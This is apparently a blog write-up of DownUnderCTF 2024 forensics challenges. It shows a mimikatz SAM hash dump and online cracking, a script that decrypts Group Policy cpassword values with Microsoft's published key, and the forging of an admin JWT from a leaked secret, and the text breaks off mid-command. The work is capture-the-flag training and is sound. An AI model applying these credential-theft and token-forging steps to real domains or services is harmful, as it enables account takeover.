饭宝 posted on 2024-7-7 22:44:27

DownUnderCTF 2024 - Forensics

Baby's First Forensics

They have been trying to breach our infrastructure all morning! They are trying to get more information about our secret kangaroos! We need your help: we captured some of the traffic while they were attacking us. Can you tell us which tool they were using and its version?
Note: wrap your answer in DUCTF{}, e.g. DUCTF{nmap_7.25}
Attachment: capture.pcap
https://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231854354-267106475.png
Nikto is a web server scanner.
DUCTF{Nikto_2.1.6}
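As an added defender-side example (not part of the original writeup): Nikto announces itself in its default User-Agent string, so the tool and version the challenge asks for can be pulled straight out of web-server access logs rather than a pcap. The log lines below are constructed, and the field layout assumes Apache combined log format.

```python
import re

# Constructed access-log lines (Apache combined log format); not taken from the challenge capture.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Jul/2024:10:01:02 +1000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/126.0"
10.0.0.9 - - [07/Jul/2024:10:01:05 +1000] "GET /cgi-bin/ HTTP/1.1" 404 196 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000001)"
10.0.0.9 - - [07/Jul/2024:10:01:05 +1000] "GET /admin/ HTTP/1.1" 404 196 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000002)"
10.0.0.7 - - [07/Jul/2024:10:01:09 +1000] "GET /robots.txt HTTP/1.1" 200 44 "-" "curl/8.5.0"
"""

# Nikto's default User-Agent carries "(Nikto/<version>)"; capture the version
NIKTO_UA = re.compile(r"\(Nikto/(?P<version>\d+(?:\.\d+)+)\)")
# Combined log format: client address first, User-Agent is the final quoted field
LOG_LINE = re.compile(r'^(?P<ip>\S+) .* "(?P<ua>[^"]*)"$')

def find_nikto_scans(log_text):
    """Map each client IP that sent a Nikto User-Agent to (version, request_count)."""
    hits = {}
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        n = NIKTO_UA.search(m.group("ua"))
        if not n:
            continue
        ip, version = m.group("ip"), n.group("version")
        _, count = hits.get(ip, (version, 0))
        hits[ip] = (version, count + 1)
    return hits

def flag_for(version):
    """Format the answer in the form the challenge expects."""
    return f"DUCTF{{Nikto_{version}}}"

if __name__ == "__main__":
    for ip, (version, count) in find_nikto_scans(SAMPLE_LOG).items():
        print(f"{ip}: Nikto {version} ({count} requests) -> {flag_for(version)}")
```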
SAM I AM

The attackers managed to get Domain Admin on our rebel domain controller! It looks like they used WMI to log in with the account and dumped some files.
Can you reproduce how they got the administrator password from the provided artifacts?
Wrap the Administrator account's password in DUCTF{}, e.g. DUCTF{password123!}
Attachment: samiam.zip
We are given the SAM and SYSTEM hives and asked for the administrator password, so mimikatz is the natural choice:
mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz # lsadump::sam /sam:\sam.bak /system:\system.bak
Domain : DUCTF-AD
SysKey : a88f47504785ba029e8fa532c4c9e27b
Local SID : S-1-5-21-2461790198-1013503533-1008536141

SAMKey : 848804bda5d876ca7027beeee0efdd7c

RID: 000001f4 (500)
User : Administrator
Hash NTLM: 476b4dddbbffde29e739b618580adb1e

RID: 000001f5 (501)
User : Guest

Look up the hash 476b4dddbbffde29e739b618580adb1e on cmd5, which gives !checkerboard1.
There should be a lookup site abroad that can do this without spending credits..
DUCTF{!checkerboard1}
Bad Policies

It looks like the attackers managed to get access to the rebels' domain controller.
Can you figure out how they got access after extracting these artifacts from one of our Outpost machines?
Attachment: badpolicies.zip
Reference: https://www.cnblogs.com/404p3rs0n/p/15675872.html
Recovering passwords stored in Group Policy
Find the configuration file Groups.xml.
Of note is its cpassword attribute, which stores the encrypted password:
B+iL/dnbBHSlVf66R8HOuAiGHAtFOVLZwXu0FYf+jQ6553UUgGNwSZucgdz98klzBuFqKtTpO1bRZIsrF8b4Hu5n6KccA7SBWlbLBWnLXAkPquHFwdC70HXBcRlz38q2

The encryption is AES-256. AES-256 itself is very hard to break, but Microsoft chose to publish the AES-256 key used here:
https://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231854840-1645691068.png
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b

With this key we can recover the plaintext.
One way to recover it is the open-source PowerShell script Get-GPPPassword.ps1 by Chris Campbell (@obscuresec).
Project: https://github.com/PowerShellMafia/PowerSploit/tree/master/Exfiltration
The script runs on a domain host; it automatically searches the files in the \SYSVOL share and recovers all the plaintext passwords:

powershell -executionpolicy bypass -file Get-GPPPassword.ps1

Here we only need the cpassword value, so the following code decrypts it directly:
#!/usr/bin/env python3
import sys
from base64 import b64decode
from Crypto.Cipher import AES  # pip install pycryptodome

if len(sys.argv) != 2:
    print("usage: decrypt.py <cpassword>")
    sys.exit(0)

# The AES-256 key Microsoft published for Group Policy Preferences passwords
key = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
cpassword = sys.argv[1]
# GPP strips the '=' padding from the base64 value; restore it before decoding
cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
ciphertext = b64decode(cpassword)
cipher = AES.new(key, AES.MODE_CBC, b"\x00" * 16)  # fixed all-zero IV
out = cipher.decrypt(ciphertext)
# Remove the PKCS#7 padding (last byte is the pad length), then decode the UTF-16LE string
print(out[:-out[-1]].decode("utf-16-le"))

https://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231855079-1413655607.png
DUCTF{D0n7_Us3_P4s5w0rds_1n_Gr0up_P0l1cy}
emuc2

Like every good nation-state, we have our own malware and C2 for offensive operations. But someone got hold of the source code and is using it against us! Here is a traffic capture we found on one of our laptops......
Attachments: sslkeylogfile.txt, challenge.pcap
The sslkeylogfile points to TLS.
An external application can decrypt TLS connections with a key log. Wireshark 1.6.0 and later can use this log file to decrypt packets. Tell Wireshark where to find the key file via Wireshark -> Preferences -> Protocols -> TLS -> (Pre)-Master-Secret log file.
https://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231855342-769422190.png
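Added example, not from the original writeup: a small parser for the SSLKEYLOGFILE format Wireshark consumes, which groups lines by client random and reports whether each session is TLS 1.2 (a CLIENT_RANDOM master secret) or TLS 1.3 (per-epoch traffic secrets), and whether enough secrets are present to decrypt application data. The keylog content is constructed filler, not the challenge's sslkeylogfile.txt.

```python
import re

# TLS 1.3 keylog labels (NSS key log format); each carries a hash-length secret
TLS13_LABELS = {
    "CLIENT_EARLY_TRAFFIC_SECRET", "CLIENT_HANDSHAKE_TRAFFIC_SECRET",
    "SERVER_HANDSHAKE_TRAFFIC_SECRET", "CLIENT_TRAFFIC_SECRET_0",
    "SERVER_TRAFFIC_SECRET_0", "EXPORTER_SECRET", "EARLY_EXPORTER_SECRET",
}
APP_DATA_13 = {"CLIENT_TRAFFIC_SECRET_0", "SERVER_TRAFFIC_SECRET_0"}
# <LABEL> <32-byte client random> <secret>, all hex
LINE = re.compile(r"^([A-Z0-9_]+) ([0-9a-fA-F]{64}) ([0-9a-fA-F]+)$")

# Constructed sample (repeated filler bytes), not the challenge's sslkeylogfile.txt
CR12, CR13 = "11" * 32, "22" * 32
SAMPLE_KEYLOG = f"""\
# comment lines are allowed in the file
CLIENT_RANDOM {CR12} {'aa' * 48}
CLIENT_HANDSHAKE_TRAFFIC_SECRET {CR13} {'bb' * 32}
SERVER_HANDSHAKE_TRAFFIC_SECRET {CR13} {'cc' * 32}
CLIENT_TRAFFIC_SECRET_0 {CR13} {'dd' * 32}
SERVER_TRAFFIC_SECRET_0 {CR13} {'ee' * 32}
CLIENT_RANDOM {'33' * 32} not-hex-at-all
"""

def parse_keylog(text):
    """Return ({client_random: session_info}, malformed_line_count)."""
    sessions, malformed = {}, 0
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE.match(line)
        if not m:
            malformed += 1
            continue
        label, cr, secret = m.group(1), m.group(2).lower(), m.group(3)
        if label == "CLIENT_RANDOM" and len(secret) == 96:        # 48-byte master secret
            version = "TLS1.2"
        elif label in TLS13_LABELS and len(secret) in (64, 96):  # SHA-256 / SHA-384 secret
            version = "TLS1.3"
        else:
            malformed += 1
            continue
        s = sessions.setdefault(cr, {"version": version, "labels": set(), "app_data": False})
        s["labels"].add(label)
        # TLS 1.2 needs only the master secret; TLS 1.3 needs both epoch-0 traffic secrets
        s["app_data"] = version == "TLS1.2" or APP_DATA_13 <= s["labels"]
    return sessions, malformed

if __name__ == "__main__":
    found, bad = parse_keylog(SAMPLE_KEYLOG)
    for cr, info in found.items():
        print(cr[:16], info["version"], "app data decryptable:", info["app_data"])
    print("malformed lines:", bad)
```

A session whose client random appears in the capture but not in this file, or whose TLS 1.3 entry lacks the epoch-0 traffic secrets, is one Wireshark will leave encrypted.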
Following the TLS streams, stream 34 mentions a JWT token, which will probably be useful later:

PRI * HTTP/2.0

SM

(binary HTTP/2 frame data omitted)
{"error":"Error validating JWT token - No token provided"}

Stream 23 contains a large chunk of encrypted data, which looks suspicious, so follow the HTTP/2 stream:
https://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231855666-489402059.png
It shows a URL path, /api/env, which will probably be useful too.
https://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231856019-261799605.png
Since there is HTTP/2 traffic, look through all of it.
We find forensics-emuc2-b6abd8652aa4.2024.ductf.dev/api/login; log in with the username and password from the capture:

{"username": "jooospeh", "password": "n3v3r-g0nna-g1v3-th3-b1rds-up"}

https://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231856331-943255486.png
It says we don't have permission to view the flag, so we either need to find the admin user's password or forge an admin login. Recalling the JWT token seen at the start, let's try forging one.
Together with the large amount of data found under /api/env earlier, try visiting one of the entries at random, e.g.:

https://forensics-emuc2-b6abd8652aa4.2024.ductf.dev/api/env/kMyYN2gsez9DQqovBkX4KwxRgpOAbxgb

https://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231856577-1316444971.png
That suggests one of these files contains the JWT token, so save the paths obtained earlier:
Tidy the list up, capture a request and brute-force the paths.
I initially assumed they were all decoy files, but after fuzzing, the response lengths showed that many of them have content. Searching for the keyword JWT locates it directly.
https://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231856864-1833019634.png
This gives the JWT secret:

JWT_SECRET=3gHsCBkpZLi99zyiPqfY/NfFJqZzmNL4BAhYN8rAjRn49baTcnmyGISLD6T58XcWIUYrBfltI2iq2N6OHQSrfqBRFxFta61PvmnfRyn8Ep8T55lvLT8Es62kN3x35Bcb0OZmOGmM/zKf2qadcBq3Nbq1MiIVKJMz4w3JOk4orwFPtSNpNh8uaSQQUNMKTT6cvD9bvRvFNeeHYSPhDFwayPIRr5TJ+BpIRTUTfc1C3WCKoOuXCz2t+ISZo5yYwZ6U5w7NKFTTuDqMP/dXevkVykuntdej55XE3fsCP+UVFUT2JrY+Z9Q1aKTgavQR5smYVn93RlpbFwCoSStoANnoi

Generate a new JWT; the data comes from the stream where the login password was found earlier:
https://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231857151-1351348247.png
import jwt  # pip install pyjwt

# Claims copied from the token observed in the capture
data = {"subject_id": 1, "exp": 1920187883}

JWT_SECRET = "3gHsCBkpZLi99zyiPqfY/NfFJqZzmNL4BAhYN8rAjRn49baTcnmyGISLD6T58XcWIUYrBfltI2iq2N6OHQSrfqBRFxFta61PvmnfRyn8Ep8T55lvLT8Es62kN3x35Bcb0OZmOGmM/zKf2qadcBq3Nbq1MiIVKJMz4w3JOk4orwFPtSNpNh8uaSQQUNMKTT6cvD9bvRvFNeeHYSPhDFwayPIRr5TJ+BpIRTUTfc1C3WCKoOuXCz2t+ISZo5yYwZ6U5w7NKFTTuDqMP/dXevkVykuntdej55XE3fsCP+UVFUT2JrY+Z9Q1aKTgavQR5smYVn93RlpbFwCoSStoANnoi"

encoded = jwt.encode(data, JWT_SECRET, algorithm="HS512")
print(encoded)

After replacing the JWT token in the browser:
https://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231857403-1065300123.png
We get the flag:
https://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231857678-767759829.png
DUCTF{pǝʇɔǝɟuᴉ_sᴉ_ǝlᴉɟ_dᴉz_ǝɥʇ_oʇ_pɹoʍssɐd_ǝɥʇ}
Macro Magic

We managed to extract this Excel spreadsheet artifact from one of our Outpost machines. Something is going on under the hood. After opening it, we found and captured some suspicious traffic on the network. Can you figure out what this traffic is and find the flag?
Note: you do not need to run or enable macros to solve this.
Attachment: macromagic.zip
Macros are mentioned, and the hint says we don't need to run or enable them. Use oledump.py to analyse the file; it can inspect the macro code without running it.
Project: https://github.com/decalage2/oledump-contrib
It needs the Python module OleFileIO_PL:

pip install olefile

Usage:
┌──(root